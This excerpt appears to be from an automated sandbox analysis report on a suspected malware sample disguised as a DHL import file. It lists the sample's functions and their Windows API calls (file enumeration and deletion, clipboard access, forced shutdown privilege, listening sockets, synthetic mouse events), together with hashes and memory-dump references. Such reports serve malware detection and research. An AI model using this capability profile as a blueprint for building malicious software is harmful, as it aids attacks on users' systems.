                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1409584000-438819550
                                                                                          • Opcode ID: 1585ffd394a8cbacaf9cd5d27d00e9914be86182e467451c7f60f5b6052147a8
                                                                                          • Instruction ID: cd4314392261b4cca704d1101cd47691404a92c0ce1c8b3ece1e3622bd890ccd
                                                                                          • Opcode Fuzzy Hash: 1585ffd394a8cbacaf9cd5d27d00e9914be86182e467451c7f60f5b6052147a8
                                                                                          • Instruction Fuzzy Hash: FF31BE3260121DAEDB20AFB4DC08AEF77ACFF09320F154156E995E22A0EB74DE408B14
                                                                                          Function 0084979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008497BE
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00849819
                                                                                          • FindClose.KERNEL32(00000000), ref: 00849824
                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00849840
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00849890
                                                                                          • SetCurrentDirectoryW.KERNEL32(00896B7C), ref: 008498AE
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 008498B8
                                                                                          • FindClose.KERNEL32(00000000), ref: 008498C5
                                                                                          • FindClose.KERNEL32(00000000), ref: 008498D5
                                                                                            • Part of subcall function 0083DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0083DB00
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                          • String ID: *.*
                                                                                          • API String ID: 2640511053-438819550
                                                                                          • Opcode ID: 9740847897e90eecb44911e1d68df71fe54ef2dac6ff67280d3d2f86ab9d26d3
                                                                                          • Instruction ID: a310d3de365d9f1ae1954d16c5fcda688ce26a7568089720c76b5ffa093ad1c2
                                                                                          • Opcode Fuzzy Hash: 9740847897e90eecb44911e1d68df71fe54ef2dac6ff67280d3d2f86ab9d26d3
                                                                                          • Instruction Fuzzy Hash: 3D31C13150021D6EDF20EFB8EC48AEF77ACFF46320F144166E990E2290EB75DA448A60
                                                                                          Function 00848195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?), ref: 00848257
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00848267
                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00848273
                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00848310
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848324
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848356
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0084838C
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848395
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1464919966-438819550
                                                                                          • Opcode ID: f4795a6cc640796550fa7bdd809157248e14e347dd8a1560610a104bad1f93f5
                                                                                          • Instruction ID: 768f29045e7cae4513883624ed1f0b8053c9229c344efc334857b0b88fa17ab2
                                                                                          • Opcode Fuzzy Hash: f4795a6cc640796550fa7bdd809157248e14e347dd8a1560610a104bad1f93f5
                                                                                          • Instruction Fuzzy Hash: 2B6135B2504209DFCB10EF64D8449AEB3E8FF89314F04891AF99AD7351EB35E945CB92
                                                                                          Function 0083D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                            • Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0083D122
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0083D1DD
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0083D1F0
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0083D20D
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083D237
                                                                                            • Part of subcall function 0083D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0083D21C,?,?), ref: 0083D2B2
                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0083D253
                                                                                          • FindClose.KERNEL32(00000000), ref: 0083D264
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 1946585618-1173974218
                                                                                          • Opcode ID: ac4c41a92573f47ea04c149b2e34c583c5c6631c8d01ea4c28e16c04856d0728
                                                                                          • Instruction ID: c1aa8041f561ecfd89cf4e23ec0cd236cfe36389a55c57c87894a328c1898d27
                                                                                          • Opcode Fuzzy Hash: ac4c41a92573f47ea04c149b2e34c583c5c6631c8d01ea4c28e16c04856d0728
                                                                                          • Instruction Fuzzy Hash: F0613C3190120DABCF05EBA0EA969EEB775FF95300F244166E401B7291EB356F09DBA1
                                                                                          Function 0084ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1737998785-0
                                                                                          • Opcode ID: b1859845253a1a108ebd68c025babf1de7a9f7c5bc4666bbe9aa37f6eb97e186
                                                                                          • Instruction ID: 9cec8e701ecd85be1d62378af440ab80dd1f89095cecefd56f97fd6d78eafea3
                                                                                          • Opcode Fuzzy Hash: b1859845253a1a108ebd68c025babf1de7a9f7c5bc4666bbe9aa37f6eb97e186
                                                                                          • Instruction Fuzzy Hash: 8B418B35604615AFE720DF19E888B29BBA1FF44318F158099E85ACB762C775EC41CB90
                                                                                          Function 0083E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 008316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
                                                                                            • Part of subcall function 008316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
                                                                                            • Part of subcall function 008316C3: GetLastError.KERNEL32 ref: 0083174A
                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0083E932
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                          • API String ID: 2234035333-3163812486
                                                                                          • Opcode ID: c2fb82bcb7f78a0f0604ccffc0d76f53e278442c85680e8aa7fbbd5ababec847
                                                                                          • Instruction ID: 379666924c19bfdf065b0fd50170b64fff082f54eba15025f36d60c6faa0577e
                                                                                          • Opcode Fuzzy Hash: c2fb82bcb7f78a0f0604ccffc0d76f53e278442c85680e8aa7fbbd5ababec847
                                                                                          • Instruction Fuzzy Hash: 5401F972710215ABEF5426B89C8AFBF765CF794754F154422FC13F21D1E6A45C4083D1
                                                                                          Function 00851204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00851276
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851283
                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 008512BA
                                                                                          • WSAGetLastError.WSOCK32 ref: 008512C5
                                                                                          • closesocket.WSOCK32(00000000), ref: 008512F4
                                                                                          • listen.WSOCK32(00000000,00000005), ref: 00851303
                                                                                          • WSAGetLastError.WSOCK32 ref: 0085130D
                                                                                          • closesocket.WSOCK32(00000000), ref: 0085133C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                          • String ID:
                                                                                          • API String ID: 540024437-0
                                                                                          • Opcode ID: e9a19b9f7a1b17e5fd6ea8f9cdaf18b7ad64f20ac364a5e7163247104a601886
                                                                                          • Instruction ID: f2bb445bf73d04a56512cdb37e5d3832b0d3f402ff33684807dbceb7e7b58ccd
                                                                                          • Opcode Fuzzy Hash: e9a19b9f7a1b17e5fd6ea8f9cdaf18b7ad64f20ac364a5e7163247104a601886
                                                                                          • Instruction Fuzzy Hash: 9C418D316001019FDB20DF24C489B69BBE6FF86319F198199E8568F392C775EC85CBE1
                                                                                          Function 0083D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                            • Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0083D420
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0083D470
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083D481
                                                                                          • FindClose.KERNEL32(00000000), ref: 0083D498
                                                                                          • FindClose.KERNEL32(00000000), ref: 0083D4A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2649000838-1173974218
                                                                                          • Opcode ID: f0d75c7a0d9d366808af555a547ff5abc0608a1f695a27c51681fd1be56c5e90
                                                                                          • Instruction ID: 2c1898a76e689f0ede28de73162994bc09726b02229fd7f67f54c7b54194fec8
                                                                                          • Opcode Fuzzy Hash: f0d75c7a0d9d366808af555a547ff5abc0608a1f695a27c51681fd1be56c5e90
                                                                                          • Instruction Fuzzy Hash: D5318E71008345ABC301EF64D8958AFB7B8FE91304F444A1EF4D593291EB34AA09DBA7
                                                                                          Function 0080E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: f52f54a45211ac9568d5c0dfb6551fc86ed4acb10edec0f54c36a980855c6121
                                                                                          • Instruction ID: 9b213d571092315c985b67b4514bb231d5416c0184b4b9e06468a739a92d2956
                                                                                          • Opcode Fuzzy Hash: f52f54a45211ac9568d5c0dfb6551fc86ed4acb10edec0f54c36a980855c6121
                                                                                          • Instruction Fuzzy Hash: 33C22A72E046288FDBB5CE289D447EAB7B5FB44304F1445EAD54DE7281E778AE818F40
                                                                                          Function 0084648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 008464DC
                                                                                          • CoInitialize.OLE32(00000000), ref: 00846639
                                                                                          • CoCreateInstance.OLE32(0086FCF8,00000000,00000001,0086FB68,?), ref: 00846650
                                                                                          • CoUninitialize.OLE32 ref: 008468D4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 886957087-24824748
                                                                                          • Opcode ID: 477df773b850872df13dc81431ec82be00987005eb7e7c1f1fb470501f87f876
                                                                                          • Instruction ID: 80a2e88f23bebe74134af34423df60cd23762be87f7a38fca4fda88372808b19
                                                                                          • Opcode Fuzzy Hash: 477df773b850872df13dc81431ec82be00987005eb7e7c1f1fb470501f87f876
                                                                                          • Instruction Fuzzy Hash: 98D13871508205AFC314EF24C885A6BB7E8FF95704F04496DF595CB2A1EB74ED05CBA2
                                                                                          Function 008522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 008522E8
                                                                                            • Part of subcall function 0084E4EC: GetWindowRect.USER32(?,?), ref: 0084E504
                                                                                          • GetDesktopWindow.USER32 ref: 00852312
                                                                                          • GetWindowRect.USER32(00000000), ref: 00852319
                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00852355
                                                                                          • GetCursorPos.USER32(?), ref: 00852381
                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008523DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2387181109-0
                                                                                          • Opcode ID: 95bdf727524ab46f423e988a2befa1f318d9346ab54aa8f09dc40c0b88e7e63d
                                                                                          • Instruction ID: 3eba9c1bbbaa65fdafecf6e8fe9526d5dc02de25ba656a1ae219989dfab41ef4
                                                                                          • Opcode Fuzzy Hash: 95bdf727524ab46f423e988a2befa1f318d9346ab54aa8f09dc40c0b88e7e63d
                                                                                          • Instruction Fuzzy Hash: AB31BE72504315AFDB20DF58C849BABBBA9FF85314F00091DF985D7291DB74EA09CB92
                                                                                          Function 00849B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00849B78
                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00849C8B
                                                                                            • Part of subcall function 00843874: GetInputState.USER32 ref: 008438CB
                                                                                            • Part of subcall function 00843874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00843966
                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00849BA8
                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00849C75
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1972594611-438819550
                                                                                          • Opcode ID: 08cea8bb3cf47c445920c658e7fbfbaa5b72eeb4206d88981133f669241e026e
                                                                                          • Instruction ID: 87a596699e9272591298dbbffd114675e2a6dc86fa03bf78a95a4d4678695dc9
                                                                                          • Opcode Fuzzy Hash: 08cea8bb3cf47c445920c658e7fbfbaa5b72eeb4206d88981133f669241e026e
                                                                                          • Instruction Fuzzy Hash: CF415E7194420EAFCF24DF64C989AEEBBB8FF05310F244156E955E2291EB349E44CF61
                                                                                          Function 007E997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 007E9A4E
                                                                                          • GetSysColor.USER32(0000000F), ref: 007E9B23
                                                                                          • SetBkColor.GDI32(?,00000000), ref: 007E9B36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$LongProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3131106179-0
                                                                                          • Opcode ID: 2ec4b7e7950e70f2898d3ec89f3a627a778a8b53094a4a907abcb56ce2d1b7cc
                                                                                          • Instruction ID: db82daf8bec88c327c88fe52283e11647e797cab7a1ee377bb5474b877ce712d
                                                                                          • Opcode Fuzzy Hash: 2ec4b7e7950e70f2898d3ec89f3a627a778a8b53094a4a907abcb56ce2d1b7cc
                                                                                          • Instruction Fuzzy Hash: FCA13C7210A5A4BEE7249A3F9C5CD7B365DFF4A304F158129F702C6AD1CA2D9D41C272
                                                                                          Function 00851806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
                                                                                            • Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B
                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0085185D
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851884
                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 008518DB
                                                                                          • WSAGetLastError.WSOCK32 ref: 008518E6
                                                                                          • closesocket.WSOCK32(00000000), ref: 00851915
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 1601658205-0
                                                                                          • Opcode ID: 2d1f4ec01169df6f5e532ec3b9ac5b38a9b493c49563cab27d6dfc3ba7ad7341
                                                                                          • Instruction ID: 4e8ac390515b94d189bfcf9b6da71fef3e33e1cdd7920de9c68ff8bd4db148fe
